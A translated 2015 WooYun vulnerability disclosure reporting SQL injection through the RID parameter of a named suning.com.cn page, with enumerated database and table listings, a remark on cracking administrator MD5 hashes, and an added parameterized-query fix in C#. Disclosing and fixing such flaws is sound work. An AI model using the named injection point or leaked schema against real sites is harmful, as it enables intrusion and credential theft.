Vulnerability Summary

Defect ID: wooyun-2015-094687

Title: SQL injection in a Suning site exposes a large amount of information (including administrator password hashes)

Vendor: 江苏苏宁易购电子商务有限公司 (Jiangsu Suning.com E-Commerce Co., Ltd.)

Author: Mr.Q

Submitted: 2015-01-30 11:00

Fixed: 2015-03-16 11:02

Published: 2015-03-16 11:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]



Vulnerability Details

Disclosure status:

2015-01-30: Details sent to the vendor; awaiting vendor action
2015-01-30: Vendor confirmed; details disclosed to the vendor only
2015-02-09: Details disclosed to core white hats and domain experts
2015-02-19: Details disclosed to regular white hats
2015-03-01: Details disclosed to intern white hats
2015-03-16: Details disclosed to the public

Brief description:

SQL injection in a Suning site exposes a large amount of information (including administrator password hashes)

Detailed description:

SQL injection in a Suning site exposes a large amount of information (including administrator password hashes).
Injection point: http://www.suning.com.cn/ListPic.aspx?RID=5&BID=7
Injectable parameter: RID

a.png



available databases [28]:
[*] BMSStore
[*] DB_ShuNin
[*] Dell_CMDB
[*] distribution
[*] Ecardtong
[*] FEPDW_S01
[*] HWATT
[*] iCCard
[*] jbtkq
[*] kaoqing
[*] localGPSDB
[*] MangageLeader3.0gr
[*] master
[*] model
[*] msdb
[*] OATOAMS
[*] PCMDB
[*] PLDM
[*] ReportServer
[*] ReportServerTempDB
[*] snuniversal
[*] suninghuanqiu
[*] tempdb
[*] VAMT
[*] VirtualManagerDB
[*] wx
[*] ZK
[*] zkteco_database


Administrator records; once the MD5 password hash is cracked, the back end can be logged into.

b.png


There is a large amount of further data, not listed one by one here. Please fix as soon as possible.

Database: suninghuanqiu
[8 tables]
+--------------------------------------------+
| Qwx_Admin |
| Qwx_Column |
| Qwx_Database |
| Qwx_Fail |
| Qwx_Info |
| Qwx_Label |
| Qwx_Online |
| dtproperties |
+--------------------------------------------+
Database: master
[59 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.change_tracking_databases |
| sys.change_tracking_tables |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.conversation_priorities |
| sys.credentials |
| sys.crypt_properties |
| sys.cryptographic_providers |
| sys.data_spaces |
| sys.database_audit_specification_details |
| sys.database_audit_specifications |
| sys.database_files |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_endpoints |
+--------------------------------------------+
Database: DB_ShuNin
[35 tables]
+--------------------------------------------+
| D99_CMD |
| D99_Tmp |
| Info_Ad |
| Info_Article |
| Info_Gbook |
| Info_Job |
| Info_Link |
| Info_Member |
| Info_Order |
| Info_PhotoList |
| Info_Procure1 |
| Info_Procure1 |
| Info_Product |
| Info_Recruitment |
| Info_Replay |
| Info_Resume |
| Info_SetJob |
| Sys_Channel |
| Sys_Class |
| Sys_Config |
| Sys_LoginUser |
| Sys_Menu |
| View_ArticleClass |
| View_JobClass |
| View_PhotoListClass |
| View_ProcureClass |
| View_SetJobClass |
| djgz_users |
| djgz_users |
| floor |
| news_class |
| news_class |
| product |
| sqlmapoutput |
| zbgg |
+--------------------------------------------+
Database: msdb
[21 tables]
+--------------------------------------------+
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| logmarkhistory |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| suspect_pages |
| sysdac_instances |
| syspolicy_conditions |
| syspolicy_configuration |
| syspolicy_object_sets |
| syspolicy_policies |
| syspolicy_policy_categories |
| syspolicy_policy_category_subscriptions |
| syspolicy_policy_execution_history_details |
| syspolicy_policy_execution_history_details |
| syspolicy_system_health_state |
| syspolicy_target_set_levels |
| syspolicy_target_sets |
+--------------------------------------------+

Proof of vulnerability:

Proven

Fix recommendation:

You are the experts here; please fix as soon as possible.
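The report leaves the fix to the vendor, so the following is an added example (written for this page, not Suning's code) of what the remediation for an injectable numeric query-string parameter looks like in an ASP.NET WebForms page such as ListPic.aspx backed by SQL Server. The table and column names (PictureList, RID, BID, Title, Url), the class names and the connection-string placeholder are all assumed; only the parameter names RID and BID come from the report.

```csharp
// Added example, not the vendor's code. Table/column names are assumed.
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;
using System.Web;

public static class PictureRepository
{
    // BEFORE: the classic pattern behind an injection in a numeric parameter.
    // The raw query-string value is pasted into the statement, so the database
    // executes whatever text arrives in RID or BID:
    //
    //   string sql = "SELECT Title, Url FROM PictureList WHERE RID=" +
    //                Request.QueryString["RID"] + " AND BID=" + Request.QueryString["BID"];
    //
    // AFTER: parse the values as integers first, then bind them as typed
    // parameters. The SQL text itself never contains user-supplied characters.

    private const string ConnectionString = "<connection string from web.config>"; // placeholder

    // Accepts only a plain, unsigned run of digits (no whitespace, sign or hex).
    public static bool TryParseId(string raw, out int id)
    {
        return int.TryParse(raw, NumberStyles.None, CultureInfo.InvariantCulture, out id)
               && id >= 0;
    }

    public static List<KeyValuePair<string, string>> GetPictures(int rid, int bid)
    {
        var result = new List<KeyValuePair<string, string>>();
        const string sql =
            "SELECT Title, Url FROM PictureList WHERE RID = @rid AND BID = @bid";

        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Typed parameters: the driver sends the values separately from the
            // statement, so they can never change the query's structure.
            cmd.Parameters.Add("@rid", SqlDbType.Int).Value = rid;
            cmd.Parameters.Add("@bid", SqlDbType.Int).Value = bid;

            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                while (reader.Read())
                {
                    result.Add(new KeyValuePair<string, string>(
                        reader.GetString(0), reader.GetString(1)));
                }
            }
        }
        return result;
    }
}

// Code-behind for the page: validate both ids before touching the database.
public partial class ListPic : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        int rid, bid;
        if (!PictureRepository.TryParseId(Request.QueryString["RID"], out rid) ||
            !PictureRepository.TryParseId(Request.QueryString["BID"], out bid))
        {
            Response.StatusCode = 400; // malformed id: refuse rather than guess
            Response.End();
            return;
        }

        var pictures = PictureRepository.GetPictures(rid, bid);
        // ... bind `pictures` to the page's repeater or data list ...
    }
}
```

Two further points a reviewer would raise from the output quoted in this report: the enumeration of 28 databases, including master and msdb, shows that the web application's SQL login could read across the whole instance, so the application should connect with a dedicated login that has rights only on its own database; and the note that the administrator hashes are plain MD5 means the stored passwords should be moved to a salted, slow password hash (for example PBKDF2 via Rfc2898DeriveBytes in .NET) so that a future leak of the table does not translate directly into back-end logins.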

Copyright notice: when reposting, please credit the source: Mr.Q@乌云


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-01-30 17:26

Vendor reply:

Thank you for the submission.

Latest status:

2015-05-27: suning.com.cn is not a Suning.com (易购) domain, thank you.